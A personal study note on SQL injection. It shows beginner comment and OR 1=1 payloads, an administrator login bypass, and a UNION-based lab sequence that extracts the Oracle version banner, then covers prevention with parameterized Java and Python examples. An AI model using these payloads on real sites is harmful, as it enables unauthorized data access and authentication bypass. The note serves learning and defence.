Attack
Beginner
If we have a query like this:
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
We can get products that aren't released yet (released = 0) through this injection:
https://insecure-website/filter?category=Gifts'--
Let’s break it down
- `--` starts a SQL comment, so everything after it is ignored
- `'` closes the string literal that the query opened around our input
The previous query becomes:
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
You can obtain every item with this injection:
https://insecure-website/filter?category=Gifts'+OR+1=1--
The previous query then becomes:
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
The same trick works against a login form with unsafe authentication:
SELECT * FROM users WHERE username = 'username' AND password = 'password'
With the username `administrator'--` the query becomes:
SELECT * FROM users WHERE username = 'administrator'--' AND password = 'password'
Union Attacks
Suppose we want to solve this lab: to solve this lab, you need to perform a SQL injection attack using "UNION SELECT".
- The first step is to figure out how many columns are returned by the original query. This is crucial because our "UNION SELECT" must return the same number of columns. Read more here.
This method is more intuitive for me
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
-- and so on until you get a response
But in this lab we need to use the other method:
' ORDER BY 1--;
' ORDER BY 2--;
-- and so on until you get an error
- Now we can begin to build a payload, but first let's try:
' UNION SELECT 'abc','efg' FROM DUAL--
It should return something and not an error (FROM DUAL is required on Oracle, which is also why the next payload reads v$version).
- The actual payload
' UNION SELECT banner,NULL FROM v$version--
SQL Injection Prevention
- Use parameterized queries (PreparedStatement in JDBC) instead of dynamically concatenated SQL.
- Note that a parameterized query does not prevent cross-site scripting: JavaScript injected inside input data is stored and returned as-is.
- 📖 OWASP Java Security Cheat Sheet
- 📖 OWASP SQL Injection Prevention Cheat Sheet
Quote
Most developers and security engineers don't even know how a parameterized query works.
String query = "SELECT * FROM products WHERE category = '"+ input + "'";
Statement statement = connection.createStatement();
ResultSet resultSet = statement.executeQuery(query);
This code can be rewritten so that user input can no longer alter the structure of the query:
PreparedStatement statement = connection.prepareStatement("SELECT * FROM products WHERE category = ?");
statement.setString(1, input);
ResultSet resultSet = statement.executeQuery();
Escaping all User-supplied input
- Only for legacy applications that, for some reason, can't migrate either to an ORM (e.g. [[../../Software Engineering/Web Development/Backend/Java/Java 11/Java Persistance API e Hibernate|Java Persistance API e Hibernate|Hibernate]]) or to parameterized queries
- This technique escapes user input before it is placed into the query
- Its implementation is very database specific.
- Each DBMS supports one or more character-escaping schemes, each specific to certain kinds of queries
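The difference between the dynamic query and the parameterized rewrite in the prevention section, as an added runnable example in Python against an in-memory SQLite database (not code from the original note; the products table, its rows and the function names are constructed here):

```python
import sqlite3

# Constructed sample data, not from the original note.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        ("Mug", "Gifts", 1),
        ("Secret gadget", "Gifts", 0),   # not released yet
        ("Lamp", "Home", 1),
    ])
    return conn

def filter_vulnerable(conn, category):
    # Dynamic SQL: the input is pasted into the statement text, so a quote
    # closes the literal and "--" comments out the released = 1 condition.
    query = ("SELECT name FROM products WHERE category = '" + category
             + "' AND released = 1")
    return [row[0] for row in conn.execute(query)]

def filter_safe(conn, category):
    # Parameterized query: the value travels separately from the statement,
    # so quotes and comment markers inside it are just characters to match.
    query = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(query, (category,))]

if __name__ == "__main__":
    conn = make_db()
    for value in ("Gifts", "Gifts'--", "Gifts' OR 1=1--"):
        print(repr(value), "dynamic:", filter_vulnerable(conn, value),
              "parameterized:", filter_safe(conn, value))
```

The parameterized version returns an empty result for the injected values because no category is literally named `Gifts'--`.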
Input Validation
- Another layer of defense is Input Validation